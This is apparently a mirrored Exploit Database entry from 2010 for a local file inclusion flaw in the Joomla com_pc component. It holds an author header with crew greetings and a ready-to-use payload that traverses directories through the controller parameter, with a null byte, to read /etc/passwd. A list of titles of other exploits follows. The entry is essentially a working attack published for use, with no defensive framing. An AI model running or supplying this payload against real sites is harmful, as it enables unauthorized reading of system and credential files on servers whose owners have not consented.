Joomla! Component com_pc – Local File Inclusion

Exploit Database
10 阅读

作者： Pyske

日期： 2010-01-17
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11168/

<------------------- header data start ------------------- >

#############################################################
# Joomla Component com_pc LFI Vulnerability
#############################################################

# Author : Pyske


# Name : com_pc


# Home : www.cyber-warrior.org


# Greez : N0kt4 , fl0rix , F0RTS3V3N , KaBaDaY&#305; , Blackapple All Cyber-warrior


# Bug Type : Local File Inlusion



# Demo Vuln. : http://server/index.php?option=com_pc&controller= [LFI]



#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path /index.php?option=com_pc&controller=index.php?option=com_pc&controller=../../../../../../../etc/passwd%00

< -- bug code end of -- >

last Exploits
Joomla! Component com_pc – Local File Inclusion的更多信息

KubeLance 1.7.6 – ‘profile.php’ SQL Injection：
Itech Multi Vendor Script 6.49 – ‘pl’ SQL Injection：
MICROSENS Profi Line Switch 10.3.1 – Privilege Escalation：
Online Inventory Manager 3.2 – Persistent Cross-Site Scripting：
Joomla! Component Clantools 1.5 – Blind SQL Injection：
phpMyAdmin 4.6.2 – (Authenticated) Remote Code Execution：
Netsia SEBA+ 0.16.1 – Add Root User (Metasploit)：
slickMsg – Cross-Site Scripting / HTML Injection：